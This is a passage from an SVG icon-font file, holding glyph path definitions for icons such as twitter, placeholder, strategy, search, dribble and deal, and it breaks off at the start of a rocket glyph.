d="M488.399 -44c5.52246 0 10 -4.47656 10 -10s-4.47754 -10 -10 -10h-464.799c-5.52246 0 -10 4.47656 -10 10s4.47754 10 10 10h23.1162v90.2041c0 14.8223 12.0596 26.8818 26.8818 26.8818h49.0254c14.8223 0 26.8818 -12.0586 26.8818 -26.8818v-90.2041h55.6924
v174.175c0 14.8223 12.0586 26.8818 26.8818 26.8818h49.0234c14.8232 0 26.8828 -12.0586 26.8828 -26.8818v-174.175h55.6914v318.464c0 14.8223 12.0596 26.8818 26.8818 26.8818h49.0244c14.8223 0 26.8818 -12.0586 26.8818 -26.8818v-318.464h21.9336zM129.504 -44
v90.2041c0 3.79492 -3.08691 6.88184 -6.88184 6.88184h-49.0244c-3.79492 0 -6.88184 -3.08691 -6.88184 -6.88184v-90.2041h62.7881zM287.985 -44v174.175c0 3.79492 -3.08789 6.88184 -6.88281 6.88184h-49.0234c-3.79492 0 -6.88184 -3.08691 -6.88184 -6.88184
v-174.175h62.7881zM446.466 -44v318.464c0 3.79492 -3.08691 6.88184 -6.88184 6.88184h-49.0244c-3.79492 0 -6.88184 -3.08691 -6.88184 -6.88184v-318.464h62.7881zM466.442 437.484c0.00683594 -0.162109 0.0234375 -0.321289 0.0234375 -0.484375v-56.9531
c0 -5.52246 -4.47656 -10 -10 -10c-5.52246 0 -10 4.47754 -10 10v33.8105l-105.928 -105.928c-3.90625 -3.9043 -10.2383 -3.9043 -14.1436 0l-37.2793 37.2803l-172.698 -172.699c-1.95215 -1.95312 -4.51172 -2.92871 -7.07129 -2.92871
c-2.55859 0 -5.11816 0.975586 -7.07031 2.92676c-3.90527 3.90625 -3.90527 10.2383 0 14.1436l179.769 179.77c1.875 1.875 4.41895 2.92871 7.07129 2.92871c2.65137 0 5.19531 -1.05371 7.07031 -2.92871l37.2803 -37.2803l98.8574 98.8584h-37.3574
c-5.52246 0 -10 4.47656 -10 10s4.47754 10 10 10h60.5c0.164062 0 0.323242 -0.0166016 0.484375 -0.0244141c2.72852 0.141602 5.50391 -0.819336 7.58789 -2.90332s3.04395 -4.85938 2.9043 -7.58789zM65.6396 144.69c0 5.52246 4.47754 10 10 10
c5.52344 0 10 -4.47754 10 -10c0 -5.52344 -4.47656 -10 -10 -10c-5.52246 0 -10 4.47656 -10 10z" />
    <glyph glyph-name="083-twitter" unicode="&#xf148;" 
d="M512 350.752c-14.2725 -21.248 -31.7764 -39.7119 -52.6084 -54.4961c0.224609 -4.44824 0.384766 -8.92773 0.384766 -13.5674c0 -138.688 -105.601 -298.688 -298.752 -298.688c-59.4248 0 -114.528 17.1201 -161.024 47.1035
c8.25586 -1.05566 16.5117 -1.43945 25.1201 -1.43945c49.0879 0 94.4316 16.832 130.144 44.7676c-45.8877 0.992188 -84.4795 31.5527 -98.0801 73.1201c6.36816 -1.4082 13.1523 -1.79199 19.8721 -1.79199c9.66406 0 18.9766 1.12012 27.5205 3.45605
c-47.7119 9.75977 -84.0957 52.1279 -84.0957 103.136v1.15234c14.0156 -7.71191 30.5596 -12.6074 47.4238 -12.9277c-27.9043 18.6562 -46.624 50.8799 -46.624 87.2314c0 19.3604 5.31152 37.3447 14.3682 53.0566c51.8711 -63.7119 129.088 -105.536 216.352 -109.792
c-1.72754 7.61621 -2.43164 15.6162 -2.43164 23.9355c0 57.8242 46.7832 104.992 104.896 104.992c29.9521 0 57.4082 -12.7041 76.6719 -33.2158c23.8721 4.76758 46.2725 13.3115 66.5605 25.4082c-7.80859 -24.6084 -24.416 -45.0244 -46.1768 -58.0166
c21.1523 2.68848 41.4404 8.22461 60.4805 16.5762z" />
    <glyph glyph-name="008-placeholder" unicode="&#xf107;" 
d="M255.893 448c113.134 0 205.229 -92.0957 205.444 -205.229c0 -12.8799 -1.28809 -25.8682 -3.64941 -38.5342c-0.107422 -0.750977 -0.537109 -3.00488 -1.39551 -6.86914c-3.11328 -13.9541 -7.72852 -27.4785 -13.7393 -40.4668
c-22.1113 -52.0586 -70.8428 -132.025 -177.429 -217.681c-2.68359 -2.14648 -5.9043 -3.21973 -9.12402 -3.21973s-6.44043 1.07324 -9.12402 3.21973c-106.693 85.6553 -155.317 165.622 -177.429 217.681c-6.01074 12.9883 -10.626 26.6201 -13.7393 40.4668
c-0.858398 3.86426 -1.28809 6.11816 -1.39551 6.86914c-2.46875 12.666 -3.64941 25.6543 -3.64941 38.5342c0 113.134 92.0957 205.229 205.229 205.229zM428.921 209.281c2.14648 10.9482 3.21973 22.2188 3.21973 33.5967c0 97.1406 -79.1074 176.248 -176.248 176.248
s-176.248 -79.1074 -176.248 -176.248c0 -11.2705 1.07324 -22.4336 3.21973 -33.4893c0 -0.322266 0.107422 -0.537109 0.107422 -0.750977c0.107422 -0.537109 0.322266 -2.14746 0.96582 -4.61621v-0.214844c2.79102 -12.0215 6.7627 -23.8281 11.915 -34.9912
c0.107422 -0.107422 0.107422 -0.322266 0.214844 -0.429688c20.0723 -47.5508 64.0801 -120.11 159.825 -199.219c95.7451 79.1084 139.754 151.668 159.825 199.219c0.107422 0.107422 0.107422 0.322266 0.214844 0.429688
c5.25977 11.2705 9.23145 22.9697 11.915 34.9912v0.214844c0.536133 2.46875 0.858398 4.0791 0.96582 4.61621c0 0.213867 0.107422 0.428711 0.107422 0.643555zM255.893 370.824c71.8086 0 130.308 -58.499 130.308 -130.308s-58.499 -130.308 -130.308 -130.308
s-130.308 58.499 -130.308 130.308s58.499 130.308 130.308 130.308zM255.893 139.189c55.9229 0 101.327 45.5117 101.327 101.327s-45.5117 101.326 -101.327 101.326s-101.326 -45.5107 -101.326 -101.326s45.4033 -101.327 101.326 -101.327z" />
    <glyph glyph-name="019-strategy" unicode="&#xf112;" 
d="M267.3 -31.04c4.14258 0 7.5 -3.35742 7.5 -7.49902s-3.35742 -7.5 -7.5 -7.5h-201.74c-10.582 0 -19.1895 8.6084 -19.1895 19.1904v52.4355h-8.4834c-14.0391 0 -25.4609 11.4219 -25.4609 25.4609s11.4209 25.4609 25.4609 25.4609h8.4834v49.0322h-8.4834
c-14.0391 0 -25.4609 11.4219 -25.4609 25.4609s11.4209 25.4609 25.4609 25.4609h8.4834v49.0332h-8.4834c-14.0391 0 -25.4609 11.4219 -25.4609 25.4609s11.4209 25.4609 25.4609 25.4609h8.4834v49.0332h-8.4834c-14.0391 0 -25.4609 11.4219 -25.4609 25.4609
s11.4209 25.4609 25.4609 25.4609h8.4834v52.4365c0 10.582 8.6084 19.1904 19.1895 19.1904h52.7402c4.14258 0 7.5 -3.3584 7.5 -7.5s-3.35742 -7.5 -7.5 -7.5h-52.7402c-2.31055 0 -4.18945 -1.87891 -4.18945 -4.19043v-52.4375h8.48633
c14.0381 0 25.4609 -11.4209 25.4609 -25.4609c0 -14.0391 -11.4229 -25.4609 -25.4609 -25.4609h-8.48633v-49.0332h8.48633c14.0381 0 25.4609 -11.4209 25.4609 -25.4609c0 -14.0391 -11.4229 -25.4609 -25.4609 -25.4609h-8.48633v-49.0332h8.48633
c14.0381 0 25.4609 -11.4219 25.4609 -25.4609s-11.4229 -25.4609 -25.4609 -25.4609h-8.48633v-49.0322h8.48633c14.0381 0 25.4609 -11.4209 25.4609 -25.4609c0 -14.0391 -11.4229 -25.4609 -25.4609 -25.4609h-8.48633v-52.4355
c0 -2.31152 1.87891 -4.19043 4.18945 -4.19043h201.74zM27.4258 350.912c0 -5.76855 4.69336 -10.4609 10.4609 -10.4609h31.9697c5.76758 0 10.4609 4.69238 10.4609 10.4609c0 5.76758 -4.69336 10.4609 -10.4609 10.4609h-15.9287
c-0.0195312 0 -0.0380859 -0.00292969 -0.0576172 -0.00292969c-0.0205078 0 -0.0380859 0.00292969 -0.0585938 0.00292969h-15.9248c-5.76758 0 -10.4609 -4.69238 -10.4609 -10.4609zM27.4258 250.957c0 -5.76855 4.69336 -10.4609 10.4609 -10.4609h15.8965
c0.0283203 0 0.0576172 0.00390625 0.0869141 0.00390625s0.0576172 -0.00390625 0.0869141 -0.00390625h15.8994c5.76758 0 10.4609 4.69336 10.4609 10.4609s-4.69336 10.4609 -10.4609 10.4609h-31.9697c-5.76758 0 -10.4609 -4.69238 -10.4609 -10.4609z
M27.4258 151.002c0 -5.76855 4.69336 -10.4609 10.4609 -10.4609h31.9697c5.76758 0 10.4609 4.69336 10.4609 10.4609s-4.69336 10.4609 -10.4609 10.4609h-15.9287c-0.0195312 0 -0.0380859 -0.00292969 -0.0576172 -0.00292969
c-0.0205078 0 -0.0380859 0.00292969 -0.0585938 0.00292969h-15.9248c-5.76758 0 -10.4609 -4.69336 -10.4609 -10.4609zM27.4258 51.0469c0 -5.76758 4.69336 -10.4609 10.4609 -10.4609h15.9072c0.0263672 0 0.0507812 0.00390625 0.0771484 0.00390625
s0.0507812 -0.00390625 0.0771484 -0.00390625h15.9082c5.76758 0 10.4609 4.69336 10.4609 10.4609c0 5.76855 -4.69336 10.4609 -10.4609 10.4609h-31.9697c-5.76758 0 -10.4609 -4.69141 -10.4609 -10.4609zM148.295 433c-4.1416 0 -7.5 3.3584 -7.5 7.5
s3.3584 7.5 7.5 7.5h202.564c28.2998 0 51.3242 -23.0244 51.3242 -51.3252v-133.679c0 -4.14258 -3.35742 -7.5 -7.5 -7.5c-4.1416 0 -7.5 3.35742 -7.5 7.5v133.679c0 20.0303 -16.2959 36.3252 -36.3242 36.3252h-202.564zM476.084 0.744141
c13.0664 -0.670898 23.4902 -11.5117 23.4912 -24.7422v-32.502c0 -4.1416 -3.3584 -7.5 -7.5 -7.5h-194.781c-4.1416 0 -7.5 3.3584 -7.5 7.5v32.5029c0 13.2305 10.4229 24.0703 23.4893 24.7422v4.66113c0 8.9209 5.64551 16.5488 13.5518 19.499l4.99121 121.026
h-16.9482c-3.875 0 -7.11328 2.95312 -7.46777 6.8125l-7.5752 82.2412c-0.194336 2.09961 0.505859 4.18359 1.92676 5.74121c1.4209 1.55859 3.43262 2.44629 5.54102 2.44629h32.1934c4.1416 0 7.5 -3.35742 7.5 -7.5v-18.0537h13.9717l2.24805 18.9375
c0.448242 3.77441 3.64844 6.61621 7.44824 6.61621h48.04c3.80078 0 7 -2.8418 7.44824 -6.61621l2.24805 -18.9375h13.9727v18.0537c0 4.14258 3.3584 7.5 7.5 7.5h32.1934c2.1084 0 4.11914 -0.887695 5.54102 -2.44629
c1.4209 -1.55762 2.11914 -3.6416 1.92676 -5.74121l-7.5752 -82.2412c-0.355469 -3.85938 -3.59277 -6.8125 -7.46777 -6.8125h-16.9482l1.26562 -30.7051c0.169922 -4.13867 -3.0459 -7.63281 -7.18457 -7.80273c-4.14355 -0.169922 -7.63184 3.04688 -7.80273 7.18555
l-1.29199 31.3223h-95.6914l-5.25879 -127.532c-0.166016 -4.01953 -3.47168 -7.19141 -7.49414 -7.19141c-3.2002 0 -5.80273 -2.60254 -5.80273 -5.80176v-4.62695h132.802v4.62695c0 3.19922 -2.60254 5.80176 -5.80176 5.80176
c-4.02246 0 -7.32812 3.17188 -7.49414 7.19141l-2.70117 65.501c-0.169922 4.13867 3.0459 7.63184 7.18555 7.80273c4.14746 0.173828 7.63184 -3.0459 7.80273 -7.18555l2.45801 -59.6133c7.90527 -2.9502 13.5508 -10.5781 13.5508 -19.499v-4.66113zM315.525 228.172
l6.19238 -67.2412h17.9229h110.086h17.9229l6.19238 67.2412h-16.4697v-18.0537c0 -4.14258 -3.3584 -7.5 -7.5 -7.5h-28.1348c-3.80176 0 -7 2.8418 -7.44824 6.61621l-2.24805 18.9375h-34.7139l-2.24805 -18.9375
c-0.448242 -3.77441 -3.64844 -6.61621 -7.44824 -6.61621h-28.1348c-4.14258 0 -7.5 3.35742 -7.5 7.5v18.0537h-16.4707zM484.574 -49h-0.000976562v25.002c0 5.38965 -4.38477 9.77539 -9.77539 9.77539h-6.21387h-147.802h-6.21387
c-5.39062 0 -9.77539 -4.38574 -9.77539 -9.77539v-25.002h179.781zM217.372 355.438c0 -18.1074 -14.7324 -32.8398 -32.8398 -32.8408c-18.1084 0 -32.8398 14.7324 -32.8398 32.8408c0 18.1074 14.7314 32.8398 32.8398 32.8398
c18.1074 0 32.8398 -14.7324 32.8398 -32.8398zM166.691 355.438c0 -9.83691 8.00293 -17.8398 17.8398 -17.8408c9.83691 0 17.8398 8.00293 17.8398 17.8408c0 9.83691 -8.00293 17.8398 -17.8398 17.8398s-17.8398 -8.00293 -17.8398 -17.8398zM187.046 221.912
c4.0293 0.958008 8.07422 -1.53125 9.03223 -5.5625c1.0957 -4.61035 2.43066 -9.22266 3.96582 -13.707c1.34082 -3.91895 -0.748047 -8.18262 -4.66699 -9.52441c-0.804688 -0.275391 -1.625 -0.40625 -2.42969 -0.40625c-3.11719 0 -6.0293 1.95898 -7.0957 5.07324
c-1.69043 4.93848 -3.15918 10.0166 -4.36719 15.0947c-0.958008 4.03027 1.53125 8.07422 5.56152 9.03223zM184.532 266.778c4.1416 0 7.5 -3.3584 7.5 -7.5v-8.25195c0 -2.13672 0.0458984 -4.2998 0.135742 -6.42871
c0.174805 -4.13867 -3.03809 -7.63574 -7.17578 -7.81055c-0.108398 -0.00488281 -0.21582 -0.00683594 -0.323242 -0.00683594c-3.99707 0 -7.31836 3.15137 -7.48828 7.18262c-0.0986328 2.33887 -0.148438 4.71582 -0.148438 7.06348v8.25195
c0 4.1416 3.35742 7.5 7.5 7.5zM285.918 112.352c3.8457 -1.53809 5.7168 -5.90234 4.17773 -9.74805c-1.17285 -2.93262 -3.98828 -4.7168 -6.96582 -4.7168c-0.926758 0 -1.86914 0.172852 -2.78223 0.538086c-4.84375 1.9375 -9.65332 4.13477 -14.2969 6.53125
c-3.68066 1.90039 -5.12402 6.42383 -3.22363 10.1045c1.89844 3.68066 6.42285 5.12402 10.1045 3.22461c4.21777 -2.17773 8.58691 -4.17383 12.9863 -5.93359zM219.523 164.677c2.39746 -3.37695 1.60449 -8.05859 -1.77148 -10.457
c-1.31836 -0.935547 -2.83496 -1.38574 -4.33691 -1.38574c-2.34668 0 -4.6582 1.09766 -6.12109 3.15723c-3.02148 4.25488 -5.87207 8.70312 -8.47266 13.2227c-2.06543 3.58984 -0.829102 8.1748 2.76074 10.2412c3.5918 2.06445 8.1748 0.829102 10.2412 -2.76074
c2.3623 -4.10742 4.95312 -8.15137 7.7002 -12.0176zM239.667 121.953c-4.09473 3.22852 -8.08398 6.69531 -11.8564 10.3008c-2.99316 2.86328 -3.10059 7.61035 -0.237305 10.6045c2.86133 2.99414 7.6084 3.10059 10.6035 0.237305
c3.42871 -3.27734 7.05566 -6.42871 10.7783 -9.36426c3.25195 -2.56543 3.80957 -7.28125 1.24512 -10.5332c-1.48047 -1.87598 -3.67578 -2.85645 -5.89453 -2.85645c-1.62598 0 -3.2627 0.526367 -4.63867 1.61133zM224.3 255.199
c-2.76855 -3.08105 -7.50977 -3.33398 -10.5898 -0.564453l-29.1768 26.2207l-29.1768 -26.2207c-1.43359 -1.28711 -3.22559 -1.9209 -5.01172 -1.9209c-2.05371 0 -4.09961 0.838867 -5.58105 2.4873c-2.76855 3.08105 -2.51562 7.82324 0.56543 10.5918l34.1895 30.7246
c0.0419922 0.0371094 0.0869141 0.0683594 0.128906 0.104492c0.0869141 0.0742188 0.175781 0.145508 0.265625 0.216797c0.0986328 0.078125 0.200195 0.154297 0.301758 0.226562c0.0898438 0.0625 0.181641 0.124023 0.273438 0.182617
c0.108398 0.0703125 0.217773 0.136719 0.330078 0.201172c0.0927734 0.0527344 0.186523 0.104492 0.282227 0.15332c0.115234 0.0595703 0.231445 0.115234 0.349609 0.168945c0.0976562 0.0439453 0.197266 0.0869141 0.296875 0.126953
c0.121094 0.0478516 0.242188 0.0908203 0.364258 0.132812c0.101562 0.0351562 0.203125 0.0693359 0.306641 0.0996094c0.128906 0.0380859 0.258789 0.0693359 0.388672 0.100586c0.100586 0.0224609 0.198242 0.0488281 0.299805 0.0673828
c0.151367 0.0292969 0.304688 0.0498047 0.458008 0.0703125c0.0820312 0.0107422 0.161133 0.0244141 0.244141 0.0332031c0.481445 0.046875 0.966797 0.046875 1.44727 0c0.0839844 -0.00878906 0.166992 -0.0234375 0.250977 -0.0341797
c0.151367 -0.0205078 0.300781 -0.0400391 0.451172 -0.0693359c0.102539 -0.0195312 0.204102 -0.0458984 0.305664 -0.0703125c0.12793 -0.0292969 0.254883 -0.0605469 0.380859 -0.0976562c0.107422 -0.03125 0.211914 -0.0654297 0.31543 -0.101562
c0.119141 -0.0410156 0.237305 -0.0830078 0.355469 -0.129883c0.101562 -0.0410156 0.202148 -0.0849609 0.303711 -0.131836c0.115234 -0.0517578 0.227539 -0.105469 0.34082 -0.164062c0.0976562 -0.0507812 0.194336 -0.102539 0.290039 -0.157227
c0.110352 -0.0634766 0.216797 -0.128906 0.324219 -0.197266c0.09375 -0.0605469 0.186523 -0.123047 0.277344 -0.1875c0.101562 -0.0703125 0.200195 -0.145508 0.298828 -0.222656c0.0908203 -0.0712891 0.180664 -0.143555 0.267578 -0.21875
c0.0419922 -0.0361328 0.0859375 -0.0673828 0.126953 -0.104492l34.1904 -30.7246c3.08008 -2.76855 3.33398 -7.51074 0.564453 -10.5918zM213.736 77.0537c2.92871 -2.92871 2.92871 -7.67773 0 -10.6055l-18.5986 -18.5986l18.5986 -18.5977
c2.92871 -2.92773 2.92871 -7.67676 0 -10.6055c-1.46387 -1.46582 -3.38477 -2.19727 -5.30371 -2.19727s-3.83887 0.732422 -5.30273 2.19727l-18.5977 18.5977l-18.5986 -18.5977c-1.46387 -1.46582 -3.38379 -2.19727 -5.30273 -2.19727
s-3.83887 0.732422 -5.30273 2.19727c-2.92871 2.92773 -2.92871 7.67676 0 10.6055l18.5977 18.5977l-18.5977 18.5986c-2.92871 2.92773 -2.92871 7.67676 0 10.6055c2.92773 2.92969 7.67676 2.92969 10.6055 0l18.5986 -18.5977l18.5977 18.5977
c2.92773 2.92969 7.67676 2.92969 10.6064 0z" />
    <glyph glyph-name="002-search" unicode="&#xf101;" 
d="M495.643 -18.3506c10.3086 -10.7227 9.9668 -27.8174 -0.746094 -38.127c-5.04199 -4.85352 -11.6846 -7.52246 -18.6855 -7.52246c-7.39746 0 -14.2998 2.93945 -19.4316 8.26855l-122.783 127.699c-34.8633 -24.501 -75.6416 -37.4072 -118.433 -37.4072
c-113.983 0 -206.72 92.7363 -206.72 206.72s92.7363 206.72 206.72 206.72s206.72 -92.7363 206.72 -206.72c0 -48.7861 -17.166 -95.6484 -48.498 -132.894zM215.563 394.073c-84.252 0 -152.793 -68.541 -152.793 -152.793s68.541 -152.793 152.793 -152.793
s152.793 68.541 152.793 152.793s-68.541 152.793 -152.793 152.793z" />
    <glyph glyph-name="087-dribble" unicode="&#xf14c;" 
d="M175.872 250.2c-63.9004 -12.9004 -122.8 -14.0996 -170.501 -4.49902c15.8984 74.0986 65.2012 136.2 130 170.999c44.1006 -42.2988 81.6006 -92.3994 111.898 -147.9c-22.7979 -7.2002 -46.7998 -13.7988 -71.3975 -18.5996zM418.571 387.901l-4.2002 -16.5
c-6.59863 -26.4004 -62.3994 -64.2002 -135.599 -91.501l-3.30176 -1.19922c-29.6992 56.0996 -67.1992 107.1 -110.999 151.199c28.2002 11.0996 59.0996 18.0996 91.1992 18.0996c57.2988 0 110.7 -20.2002 153.3 -52.2988
c3.29883 -2.40039 6.60156 -4.80078 9.60059 -7.7998zM287.171 179.701c-102.299 -36.6016 -182.1 -109.501 -193.501 -178.499c-0.297852 -1.7998 -0.598633 -3.60059 -0.898438 -5.40039c-56.1006 46.7998 -92.1006 117.299 -92.1006 196.199
c0 8.09961 -0.700195 15.9014 -0.0986328 23.7012c23.6992 -4.50098 48.6992 -6.30078 72.0996 -6.30078c40.7998 0 79.499 5.39941 109.199 11.3994c27.3008 5.39941 54.001 12.5996 79.2002 21c9.59961 -20.1006 18.2998 -40.8008 26.0996 -62.0996zM297.071 151.501
c20.3994 -64.2002 31.7998 -133.9 32.999 -204.401c-23.3994 -7.19922 -48.6006 -11.0996 -74.3994 -11.0996c-48.2998 0 -93.5996 14.5 -132.001 37.9014c-1.5 7.19922 -1.5 14.6992 -0.297852 22.5c9.2998 56.6982 83.6992 122.398 173.699 155.1zM508.97 155.701
c-12.5986 -87.9023 -70.8984 -161.4 -149.499 -196.501c-2.09961 69.5996 -14.1006 137.4 -34.1992 201.301c67.1992 18.5986 130.9 16.499 183.698 -4.7998zM511.671 192v-5.40039c-57.2988 21.3018 -125.2 22.2002 -196 2.10059
c-7.7998 21.5986 -16.7998 42.5986 -26.3994 62.999c49.3105 18.5146 141.337 61.127 154.199 112.5c41.7012 -45.2979 68.2002 -105.898 68.2002 -172.199z" />
    <glyph glyph-name="052-arrows-2" unicode="&#xf12e;" 
d="M165.647 191.881l222.492 -222.492c7.37305 -7.63379 7.37305 -19.7383 0 -27.373c-7.55859 -7.82715 -20.0312 -8.04395 -27.8584 -0.485352l-236.421 236.422c-7.69043 7.69336 -7.69043 20.165 0 27.8584l236.421 236.421c7.69336 7.69043 20.1641 7.69043 27.8584 0
c7.69141 -7.69336 7.69141 -20.165 0 -27.8584z" />
    <glyph glyph-name="045-deal" unicode="&#xf129;" 
d="M509.071 253.938c3.90527 -3.90625 3.90527 -10.2402 -0.00195312 -14.1445l-58.3467 -58.3477c-4.68555 -4.68359 -10.8408 -7.02637 -16.9951 -7.02637c-4.82129 0 -9.63379 1.45898 -13.749 4.33496l-32.8096 -30c2.26074 -4.47656 3.47266 -9.44434 3.49023 -14.6084
c0.0292969 -8.77148 -3.37109 -17.0176 -9.57324 -23.2178c-5.94531 -5.94629 -13.7764 -9.31836 -22.1465 -9.55957c0.0263672 -8.1543 -2.91895 -16.3281 -8.87012 -22.8096c-5.91992 -6.45117 -13.9268 -10.2656 -22.6299 -10.8057
c0 -0.0175781 0.000976562 -0.0341797 0.000976562 -0.0527344c0.115234 -8.41602 -3.09863 -16.3301 -9.05078 -22.2822c-5.63281 -5.63379 -12.918 -8.63379 -20.3115 -9.00195c-0.31543 -7.62305 -3.43457 -14.7441 -8.86133 -20.1709
c-5.73145 -5.73242 -13.3535 -8.88867 -21.46 -8.88867s-15.7285 3.15625 -21.46 8.88867l-12.2275 12.2275c-4.79004 -2.55957 -10.2549 -4.01562 -16.0547 -4.01562c-18.8535 0 -34.1914 15.3379 -34.1914 34.1914
c0 0.0146484 0.000976562 0.0292969 0.000976562 0.0439453c-18.7949 0.0693359 -34.0635 15.377 -34.0635 34.1875v0.00683594c-0.0419922 0 -0.0839844 -0.00292969 -0.125977 -0.00292969c-18.8535 0 -34.1914 15.3379 -34.1914 34.1904
c0 5.78809 1.4502 11.2412 4 16.0254l-32.8428 32.8428c-2.68359 -0.989258 -5.50391 -1.50684 -8.3291 -1.50684c-6.1543 0 -12.3086 2.3418 -16.9951 7.02832l-58.3467 58.3467c-3.90527 3.90723 -3.90527 10.2412 0 14.1475l95.9482 95.9492
c3.91016 3.90527 10.2422 3.90625 14.1484 0c3.90625 -3.90723 3.90625 -10.2412 0 -14.1475l-88.876 -88.875l51.2705 -51.2734c1.02637 -1.02539 2.22559 -1.17871 2.84863 -1.17871c0.598633 0 1.72852 0.150391 2.72656 1.07324
c0.03125 0.03125 0.0576172 0.0664062 0.0898438 0.0986328l98.4951 98.4717l2.78613 2.78516c1.02832 1.02734 1.18164 2.22656 1.18164 2.84863s-0.154297 1.82031 -1.18066 2.84668l-33.4814 33.4814c-3.90625 3.9082 -3.90625 10.2422 0 14.1475
c3.9082 3.90625 10.2402 3.90625 14.1475 0l33.4814 -33.4805c4.53906 -4.53906 7.04004 -10.5752 7.04004 -16.9951c0 -2.19141 -0.297852 -4.33398 -0.862305 -6.39258l14.6816 -14.6816h32.9551h3.53711h44.877l11.6387 11.6377
c-3.71777 8.75684 -2.02832 19.2832 5.09961 26.4121l34.4111 34.4111c3.90918 3.90625 10.2412 3.90625 14.1484 0c3.90527 -3.90723 3.90527 -10.2412 0 -14.1465l-34.4111 -34.4131c-1.57129 -1.57129 -1.57129 -4.12598 0 -5.69629l101.25 -101.249
c1.56934 -1.57031 4.12402 -1.57031 5.69531 0l51.2734 51.2725l-87.6973 87.6963c-3.90527 3.9082 -3.90527 10.2422 0 14.1484c3.9082 3.90625 10.2422 3.90527 14.1484 0zM149.636 112.89c7.82031 0 14.1836 6.3623 14.1846 14.1846
c0 7.82129 -6.36328 14.1846 -14.1846 14.1846c-7.82227 0 -14.1855 -6.36328 -14.1855 -14.1846c0 -7.82227 6.36328 -14.1846 14.1855 -14.1846zM194.517 83.4482c2.24219 2.50879 3.61914 5.80762 3.62012 9.43164c0 7.82227 -6.36328 14.1855 -14.1855 14.1855
s-14.1836 -6.36328 -14.1836 -14.1855c0 -7.82129 6.3623 -14.1846 14.1836 -14.1846c3.59375 0 6.87012 1.35449 9.37305 3.56738c0.387695 0.404297 0.785156 0.799805 1.19238 1.18555zM228.181 48.7744c2.48242 2.55566 4.01855 6.03516 4.01855 9.87109
c0 7.82129 -6.36426 14.1846 -14.1846 14.1846c-3.59375 0 -6.87109 -1.35352 -9.37305 -3.56543c-0.388672 -0.405273 -0.785156 -0.800781 -1.19238 -1.18652c-2.24316 -2.50879 -3.61914 -5.80762 -3.61914 -9.43066c0 -7.82129 6.36328 -14.1846 14.1865 -14.1865
c3.8418 0 7.32812 1.54102 9.88477 4.03223c0.0478516 0.0498047 0.0888672 0.104492 0.138672 0.154297c0.0449219 0.0449219 0.0947266 0.0830078 0.140625 0.126953zM366.94 125.072c2.40625 2.40723 3.72559 5.60547 3.71094 9.00293
c-0.00976562 3.40234 -1.34961 6.5918 -3.77148 8.98242l-64.8252 63.9668l-36.665 0.402344l-33.4912 -33.4922c-6.03711 -6.03711 -14.0654 -9.3623 -22.6035 -9.3623c-8.53711 0 -16.5654 3.32422 -22.6025 9.3623c-6.03711 6.03711 -9.36133 14.0635 -9.36133 22.6016
s3.32422 16.5664 9.36133 22.6035l39.4863 39.4863h-12.9482c-2.65234 0 -5.19629 1.05371 -7.07324 2.92969l-15.3984 15.4004l-88.4404 -88.4414l31.2646 -31.2646c4.78809 2.55762 10.251 4.0127 16.0488 4.0127c18.8535 0 34.1914 -15.3369 34.1914 -34.1904
v-0.00585938c0.0419922 0 0.0830078 0.00292969 0.125 0.00292969c18.8535 0 34.1914 -15.3379 34.1914 -34.1914c0 -0.0146484 -0.000976562 -0.0283203 -0.000976562 -0.0439453c18.7949 -0.0683594 34.0645 -15.377 34.0645 -34.1875
c0 -5.78613 -1.44824 -11.2373 -3.99707 -16.0195l12.2354 -12.2344c1.9541 -1.9541 4.5498 -3.03027 7.31348 -3.03027c2.76172 0 5.3584 1.0752 7.3125 3.0293c1.9541 1.95215 3.03027 4.55078 3.03027 7.3125s-1.07617 5.35938 -3.03027 7.31348l-10.5 10.5
c-1.95312 1.95117 -2.92969 4.5127 -2.92969 7.07227c0 2.56055 0.976562 5.11914 2.92969 7.07324c3.90918 3.90625 10.2412 3.90625 14.1484 0l10.1006 -10.1006c4.25098 -4.25195 11.1729 -4.25293 15.4238 0c2.10059 2.09961 3.23438 4.8916 3.19336 7.86133
c-0.0410156 2.9707 -1.25098 5.73047 -3.4082 7.77246l-21.7871 20.625c-4.01172 3.79883 -4.18457 10.1299 -0.386719 14.1416c3.79785 4.01367 10.1289 4.18652 14.1416 0.388672l20.0117 -18.9424c2.66016 -2.51855 6.14941 -3.8418 9.80469 -3.70703
c3.66309 0.12793 7.04395 1.68555 9.52246 4.38477c4.93164 5.37207 4.75586 13.6182 -0.401367 18.7744l-0.0634766 0.0634766s-0.000976562 0.000976562 -0.00195312 0.000976562l-20.7803 20.7812c-3.90625 3.90723 -3.90625 10.2412 0 14.1475
c3.90918 3.90625 10.2412 3.90625 14.1475 0l20.7822 -20.7832c2.39551 -2.39258 5.57715 -3.71094 8.96289 -3.71094s6.56836 1.31836 8.96289 3.71191zM374.17 163.976l31.3574 28.6738l-82.2363 82.2373l-13.3281 -13.3281
c-1.87598 -1.87598 -4.41992 -2.92969 -7.07324 -2.92969h-48.416l-53.6328 -53.6338c-2.25977 -2.25879 -3.50195 -5.26172 -3.50195 -8.45605c0 -3.19336 1.24219 -6.19629 3.50195 -8.4541c2.25879 -2.25977 5.26172 -3.50293 8.4541 -3.50293
c3.19336 0 6.19629 1.24316 8.45508 3.50293l36.4678 36.4678c1.90234 1.90137 4.48242 2.94922 7.18262 2.92871l43.5391 -0.476562c2.91406 0.342773 5.95117 -0.586914 8.20117 -2.80859l0.0878906 -0.0869141l0.00292969 -0.00292969zM428.354 242.26
c0 5.51367 4.46973 9.98242 9.9834 9.98242s9.9834 -4.46875 9.9834 -9.98242s-4.46973 -9.9834 -9.9834 -9.9834s-9.9834 4.46973 -9.9834 9.9834zM62.6611 241.26c0 5.51367 4.46973 9.98242 9.9834 9.98242c5.5127 0 9.98242 -4.46875 9.98242 -9.98242
s-4.46973 -9.9834 -9.98242 -9.9834c-5.51367 0 -9.9834 4.46973 -9.9834 9.9834zM121.081 365.86c0 5.51367 4.46973 9.9834 9.9834 9.9834s9.98242 -4.46973 9.98242 -9.9834c0 -5.5127 -4.46875 -9.98242 -9.98242 -9.98242s-9.9834 4.46973 -9.9834 9.98242z
M370.774 366.662c0 5.51367 4.46973 9.98242 9.9834 9.98242s9.9834 -4.46875 9.9834 -9.98242s-4.46973 -9.9834 -9.9834 -9.9834s-9.9834 4.46973 -9.9834 9.9834z" />
    <glyph glyph-name="035-rocket" unicode="&#xf11f;" 
